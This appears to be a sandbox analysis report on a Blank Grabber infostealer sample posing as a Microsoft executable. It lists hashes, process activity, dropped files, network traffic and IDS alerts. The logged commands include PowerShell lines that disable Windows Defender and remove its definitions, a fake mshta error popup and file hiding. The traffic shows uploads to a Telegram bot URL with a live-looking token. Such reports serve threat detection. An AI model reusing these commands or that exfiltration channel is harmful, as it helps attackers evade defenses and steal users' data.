File name: | Game.exe |
Full analysis: | https://app.any.run/tasks/661e89f2-0863-47f5-950a-12776a7a8f2c |
Verdict: | Malicious activity |
Threats: | Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks. |
Analysis date: | December 14, 2024, 11:17:49 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.microsoft.portable-executable |
File info: | PE32+ executable (GUI) x86-64, for MS Windows, 6 sections |
MD5: | 07AD13F56A439C395BA890FB812AF52D |
SHA1: | 6C87F8B2AE65A46AF57DFC6DF4BF5B0219939AEC |
SHA256: | CCFFAC4327D7C7FC56F9045CA29550F15D44B5C1DA6B7DD282CD88350C91CF0E |
SSDEEP: | 98304:ZJ3BkbphA+GmE/ZsG6TRAXfjE+DkVkFOBNdtLOSA2ibMlq0Tf446XefqqQVH68Dt:Q+qxqeJ44a+bAdjRnbdU8 |
.exe | | | Win64 Executable (generic) (87.3) |
---|---|---|
.exe | | | Generic Win/DOS Executable (6.3) |
.exe | | | DOS Executable Generic (6.3) |
ProductVersion: | 10.0.26100.1 |
---|---|
ProductName: | Microsoft® Windows® Operating System |
OriginalFileName: | WpdShExtAutoplay.exe |
LegalCopyright: | © Microsoft Corporation. All rights reserved. |
InternalName: | WpdShExtAutoplay.exe |
FileVersion: | 10.0.26100.1 (WinBuild.160101.0800) |
FileDescription: | Windows Portable Device Shell Extension Autoplay Handler |
CompanyName: | Microsoft Corporation |
CharacterSet: | Unicode |
LanguageCode: | English (U.S.) |
FileSubtype: | - |
ObjectFileType: | Executable application |
FileOS: | Windows NT 32-bit |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 10.0.26100.1 |
FileVersionNumber: | 10.0.26100.1 |
Subsystem: | Windows GUI |
SubsystemVersion: | 6 |
ImageVersion: | - |
OSVersion: | 6 |
EntryPoint: | 0xce20 |
UninitializedDataSize: | - |
InitializedDataSize: | 180224 |
CodeSize: | 172032 |
LinkerVersion: | 14.41 |
PEType: | PE32+ |
ImageFileCharacteristics: | Executable, Large address aware |
TimeStamp: | 2024:12:11 05:51:29+00:00 |
MachineType: | AMD AMD64 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4136 | "C:\Users\admin\Desktop\Game.exe" | C:\Users\admin\Desktop\Game.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Portable Device Shell Extension Autoplay Handler Exit code: 0 Version: 10.0.26100.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5888 | "C:\Users\admin\Desktop\Game.exe" | C:\Users\admin\Desktop\Game.exe | — | Game.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Portable Device Shell Extension Autoplay Handler Exit code: 0 Version: 10.0.26100.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
4244 | "C:\Users\admin\Desktop\Game.exe" C:\Users\admin\Desktop\Game.exe | C:\Users\admin\Desktop\Game.exe | Game.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Portable Device Shell Extension Autoplay Handler Exit code: 0 Version: 10.0.26100.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
4384 | "C:\Users\admin\Desktop\Game.exe" C:\Users\admin\Desktop\Game.exe | C:\Users\admin\Desktop\Game.exe | Game.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Portable Device Shell Extension Autoplay Handler Exit code: 0 Version: 10.0.26100.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5792 | C:\WINDOWS\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\admin\Desktop\Game.exe'" | C:\Windows\System32\cmd.exe | — | Game.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5684 | C:\WINDOWS\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" | C:\Windows\System32\cmd.exe | — | Game.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5736 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
3608 | C:\WINDOWS\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('DLL 초기화 루틴을 실행할 수 없습니다.', 0, '아카쿠비 투기장 Ver1.05c Kr on Zelyx', 0+16);close()"" | C:\Windows\System32\cmd.exe | — | Game.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1520 | C:\WINDOWS\system32\cmd.exe /c "attrib +h +s "C:\Users\admin\Desktop\Game.exe"" | C:\Windows\System32\cmd.exe | — | Game.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1868 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (4384) Game.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib |
Operation: | write | Name: | 1280x720x32(BGR 0) |
Value: 31,31,31,31 | |||
(PID) Process: | (6964) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
Operation: | write | Name: | SessionIdHigh |
Value: 31149593 | |||
(PID) Process: | (6964) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
Operation: | write | Name: | SessionIdLow |
Value: | |||
(PID) Process: | (4952) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
Operation: | write | Name: | CachePrefix |
Value: | |||
(PID) Process: | (4952) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (4952) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: |
PID | Process | Filename | Type | |
---|---|---|---|---|
4136 | Game.exe | C:\Users\admin\AppData\Local\Temp\_MEI41362\_ctypes.pyd | executable | |
MD5:79879C679A12FAC03F472463BB8CEFF7 | SHA256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3 | |||
4136 | Game.exe | C:\Users\admin\AppData\Local\Temp\_MEI41362\_ssl.pyd | executable | |
MD5:7EF27CD65635DFBA6076771B46C1B99F | SHA256:6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4 | |||
4136 | Game.exe | C:\Users\admin\AppData\Local\Temp\_MEI41362\_hashlib.pyd | executable | |
MD5:D6F123C4453230743ADCC06211236BC0 | SHA256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9 | |||
4136 | Game.exe | C:\Users\admin\AppData\Local\Temp\_MEI41362\sqlite3.dll | executable | |
MD5:21AEA45D065ECFA10AB8232F15AC78CF | SHA256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7 | |||
4136 | Game.exe | C:\Users\admin\AppData\Local\Temp\_MEI41362\VCRUNTIME140.dll | executable | |
MD5:862F820C3251E4CA6FC0AC00E4092239 | SHA256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153 | |||
4136 | Game.exe | C:\Users\admin\AppData\Local\Temp\_MEI41362\_bz2.pyd | executable | |
MD5:58FC4C56F7F400DE210E98CCB8FDC4B2 | SHA256:DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150 | |||
4136 | Game.exe | C:\Users\admin\AppData\Local\Temp\_MEI41362\_queue.pyd | executable | |
MD5:513DCE65C09B3ABC516687F99A6971D8 | SHA256:D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC | |||
4136 | Game.exe | C:\Users\admin\AppData\Local\Temp\_MEI41362\_socket.pyd | executable | |
MD5:14392D71DFE6D6BDC3EBCDBDE3C4049C | SHA256:A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2 | |||
4136 | Game.exe | C:\Users\admin\AppData\Local\Temp\_MEI41362\_lzma.pyd | executable | |
MD5:055EB9D91C42BB228A72BF5B7B77C0C8 | SHA256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E | |||
4136 | Game.exe | C:\Users\admin\AppData\Local\Temp\_MEI41362\_sqlite3.pyd | executable | |
MD5:8CD40257514A16060D5D882788855B55 | SHA256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4384 | Game.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/json/?fields=225545 | unknown | — | — | shared |
— | — | GET | 204 | 142.250.186.67:443 | https://gstatic.com/generate_204 | unknown | — | — | — |
4712 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6092 | svchost.exe | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6092 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | POST | 200 | 149.154.167.99:443 | https://api.telegram.org/bot7900594794:AAFQ405CfH-3WDDdCXW8EUS6ISsGGM1OX7Q/sendDocument | unknown | binary | 1.70 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
6092 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 104.126.37.131:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
— | — | 192.168.100.255:138 | — | — | — | whitelisted |
6092 | svchost.exe | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
6092 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
gstatic.com |
| whitelisted |
ip-api.com |
| shared |
api.telegram.org |
| shared |
self.events.data.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
— | — | Misc activity | SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram |
— | — | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
— | — | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
— | — | A Network Trojan was detected | STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check |
— | — | Misc activity | ET HUNTING Telegram API Domain in DNS Lookup |
— | — | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) |